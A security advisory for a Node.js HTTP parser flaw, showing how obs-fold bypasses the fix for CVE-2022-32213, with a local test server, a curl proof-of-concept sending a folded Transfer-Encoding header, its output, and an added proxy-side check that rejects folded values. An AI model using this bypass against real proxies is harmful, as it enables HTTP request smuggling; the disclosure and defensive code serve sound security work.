CVSS3: 6.5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVSS2: 6.4 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N

EPSS: 0.02 Low
Percentile: 87.4%

The fix for CVE-2022-32213 can be bypassed using an obs-fold, which Node’s http parser supports.

    const http = require('http');

    // Test server: reads the whole request body, then echoes the parsed headers.
    http.createServer((request, response) => {
      let body = [];
      request.on('error', (err) => {
        response.end("error while reading body: " + err)
      }).on('data', (chunk) => {
        // Collect body chunks as they arrive.
        body.push(chunk);
      }).on('end', () => {
        body = Buffer.concat(body).toString();
        response.on('error', (err) => {
          response.end("error while sending response: " + err)
        });
        // Print the headers as Node's parser reported them.
        response.end("Headers: " + JSON.stringify(request.headers));
      });
    }).listen(5000);

Send the obs-fold via curl:

    curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000

The server accepts the chunked request and incorrectly folds abc into the value of the Transfer-Encoding header. This is visible in the printed headers, where “transfer-encoding” has the value “chunked abc”.

Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"}

If the Node.js HTTP module is used as a proxy, it incorrectly parses the Transfer-Encoding header as indicating a chunked request while folding the header, and hence forwards Transfer-Encoding: chunked abc, which is not a valid Transfer-Encoding header, to the downstream server. As such, this can lead to HTTP request smuggling, as indicated by CVE-2022-32213.
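
A proxy-side check for the condition described above, as an added example that is not part of the original report or of Node.js itself: it flags obs-fold continuation lines in a raw request head and refuses to forward a Transfer-Encoding value such as "chunked abc". The function names, the constructed sample request, and the deliberately strict rule (bare tokens only, no transfer parameters) are assumptions of this example.

```javascript
// Added example (not Node.js project code). Function names are hypothetical.

// Token characters (tchar) allowed in a transfer-coding name per RFC 9110.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Return the lower-cased names of headers that are continued by an obs-fold,
// i.e. a CRLF followed by SP or HTAB inside the header section.
function findObsFold(rawHead) {
  const head = rawHead.split('\r\n\r\n')[0];
  const lines = head.split('\r\n').slice(1); // skip the request line
  const folded = [];
  let current = null;
  for (const line of lines) {
    if (/^[ \t]/.test(line)) {
      // Continuation line: attribute it to the header that precedes it.
      if (current !== null && !folded.includes(current)) folded.push(current);
    } else {
      const idx = line.indexOf(':');
      current = idx > 0 ? line.slice(0, idx).toLowerCase() : null;
    }
  }
  return folded;
}

// Strict policy (assumption): accept only a comma-separated list of bare
// tokens in which "chunked" appears exactly once and last. The folded value
// "chunked abc" fails because the embedded space is not a token character.
function isForwardableTransferEncoding(value) {
  const codings = value.split(',').map((c) => c.trim().toLowerCase());
  if (!codings.every((c) => TOKEN.test(c))) return false;
  const last = codings.length - 1;
  return codings[last] === 'chunked' && codings.indexOf('chunked') === last;
}

// Constructed sample: a request head shaped like the one the curl command sends.
const SAMPLE_HEAD =
  'POST / HTTP/1.1\r\nHost: 127.0.0.1:5000\r\n' +
  'Transfer-Encoding: chunked\r\n abc\r\n' +
  'Content-Type: application/x-www-form-urlencoded\r\n\r\n';

console.log(findObsFold(SAMPLE_HEAD));                       // folded header names
console.log(isForwardableTransferEncoding('chunked abc'));   // folded value
console.log(isForwardableTransferEncoding('gzip, chunked')); // well-formed value
```

Rejecting the request outright when either check fails avoids forwarding a header that the downstream server may interpret differently.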